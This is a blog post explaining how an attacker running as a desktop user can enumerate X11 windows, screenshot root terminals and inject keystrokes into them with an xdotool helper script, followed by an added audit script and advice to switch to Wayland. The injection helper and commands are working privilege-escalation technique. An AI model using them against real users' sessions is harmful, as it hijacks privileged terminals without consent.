Friday, 20 April 2018

Privilege escalation and pivoting with the X Window System

What is X?

"X provides the basic framework for a GUI environment: drawing and moving windows on the display device and interacting with a mouse and keyboard. X does not mandate the user interface – this is handled by individual programs. As such, the visual styling of X-based environments varies greatly; different programs may present radically different interfaces."

X provides the GUI layer on most Linux desktops and is very common. It is being phased out by Wayland; however, it is still very popular.

How you can [ab]use X.

Suppose you have access to an Admin's workstation, and if they are anything like myself, they have a lot of windows open. Once you are running as that user, you basically have control over their X session. This means that you can view what windows are open and even send keystrokes to them.

To view the windows and some rudimentary information about them, you can use:

$ xwininfo -tree -root -all

Looking through this, you can easily spot interesting windows. Searching for 'root@', for me, revealed that I had two root terminals open:

$ xwininfo -root -tree | grep "root@"
     0x26008f2 "root@parrot:~": ("gnome-terminal-server" "Gnome-terminal")  960x1016+10+45  +960+64
     0x2601f64 "root@llama:~": ("gnome-terminal-server" "Gnome-terminal")  960x1016+10+45  +960+64

Out of curiosity, we can even see what is on those windows by taking a dump of the window and viewing the dump in xwud or by converting it to a jpg:

$ xwd -id 0x2601f64 -out llama.xwd
$ convert llama.xwd llama.jpg


In order to take a screenshot, the window must be fully displayed or you are at risk of things being chopped off. Activating the window allows for a reliable screenshot, and you can even put the original window back when you are done:

$ PREV=`xdotool getactivewindow`; xdotool windowactivate  0x2601f64; xwd -id 0x2601f64 -out llama.xwd; xdotool windowactivate $PREV

Now for the fun part; let's send keyboard events to the window. To control the mouse and keyboard we can use a tool called 'xdotool'. I have found best results when sending single keystrokes along with a short delay. In addition, some characters have to be mapped to their X keysym names (for example, a space becomes "space"). I made a small helper, xdotoolhelper, to handle this:

#!/bin/bash
# Usage: xdotoolhelper <window-id> <text>
WINDOW=$1
MSG=$2

xdotool windowactivate "$WINDOW"
# Send one keysym at a time; characters that are not valid keysym
# names on their own are mapped to their X keysym names first.
while read -r -n1 i; do
    case $i in
        "")    i="space"     ;;
        "\"")  i="quotedbl"  ;;
        "@")   i="at"        ;;
        "-")   i="minus"     ;;
        ";")   i="semicolon" ;;
    esac
    xdotool key "$i"
    sleep 0.01
done <<<"$MSG"
xdotool key Return

Now, we can simply send keyboard input to other windows:

$ ./ 0x2601f64 "yum -y install sl; sl"

Tadaa. Now we can control applications even if they originally required a 100 character passphrase, fingerprint recognition and a stool sample in order to authenticate.

Am I using X?

To determine if the user is using X, you can run the following:

$ loginctl
   SESSION    UID   USER   SEAT    TTY            
        c1    42    gdm    seat0   /dev/tty1      
        44    1000  adam   seat0   /dev/tty2      

2 sessions listed.

$ loginctl show-session 44 -p Type
Type=x11    <-- That is X
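As an added example that is not part of the original post, here is a small audit helper an admin can run from their own session to see what the two checks above expose: it parses the `loginctl` session list to find X11 sessions and scans `xwininfo -root -tree` output for windows whose title looks like a root shell, i.e. windows that any process running as the same user could drive. The functions read text from stdin, so they run offline on the constructed sample output embedded below; the window ids, titles and session numbers in the samples are made up.

```bash
#!/bin/bash
# Added audit helper, not from the original post. It parses the `loginctl`
# session list and `xwininfo -root -tree` output so an admin can see whether
# their session is X11 and which open windows look like privileged shells.

# Constructed sample of `loginctl` session list output.
SAMPLE_SESSIONS='   SESSION    UID   USER   SEAT    TTY
        c1    42    gdm    seat0   /dev/tty1
        44    1000  adam   seat0   /dev/tty2

2 sessions listed.'
# Constructed `xwininfo -root -tree` fragment; ids and titles are made up.
SAMPLE_WINDOWS='     0x26008f2 "root@parrot:~": ("gnome-terminal-server" "Gnome-terminal")  960x1016+10+45  +960+64
     0x2601f64 "adam@llama:~": ("gnome-terminal-server" "Gnome-terminal")  960x1016+10+45  +960+64
     0x2e00003 "Mozilla Firefox": ("Navigator" "Firefox")  1920x1080+0+0  +0+0'

# Stand-in for `loginctl show-session <id> -p Type` on the sample sessions.
sample_session_type() {
    case "$1" in
        c1|44) echo x11 ;;      # constructed: both sample sessions are X11
        *)     echo unknown ;;
    esac
}
# Live lookup: loginctl prints "Type=x11" or "Type=wayland"; keep the value.
live_session_type() {
    loginctl show-session "$1" -p Type 2>/dev/null | sed 's/^Type=//'
}

# x11_sessions <type-fn>: reads `loginctl` list output on stdin and prints
# "USER SESSION" for every session whose Type is x11.
x11_sessions() {
    local fn=$1 sid user
    awk 'NR > 1 && NF >= 3 && !/sessions listed/ { print $1, $3 }' |
    while read -r sid user; do
        [ "$("$fn" "$sid")" = x11 ] && echo "$user $sid"
    done
    return 0
}

# privileged_windows: reads `xwininfo -root -tree` output on stdin and prints
# "ID TITLE" for windows whose title looks like a root shell prompt.
privileged_windows() {
    awk -F'"' '$2 ~ /^root@/ { gsub(/[[:space:]]/, "", $1); print $1, $2 }'
}

# Offline run on the samples; for live use, pipe the real command output
# through the same functions with live_session_type.
printf '%s\n' "$SAMPLE_SESSIONS" | x11_sessions sample_session_type
printf '%s\n' "$SAMPLE_WINDOWS" | privileged_windows
```

On the sample data this reports that both sessions are X11 and that one open window (0x26008f2) is a root shell reachable from the unprivileged session.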

It's a feature, not a bug.

Windowing systems have a bad history of bridging supposedly sandboxed things, not because of bugs but because of their inherent design. Wayland is replacing X and has a much stronger security focus. Move to Wayland!
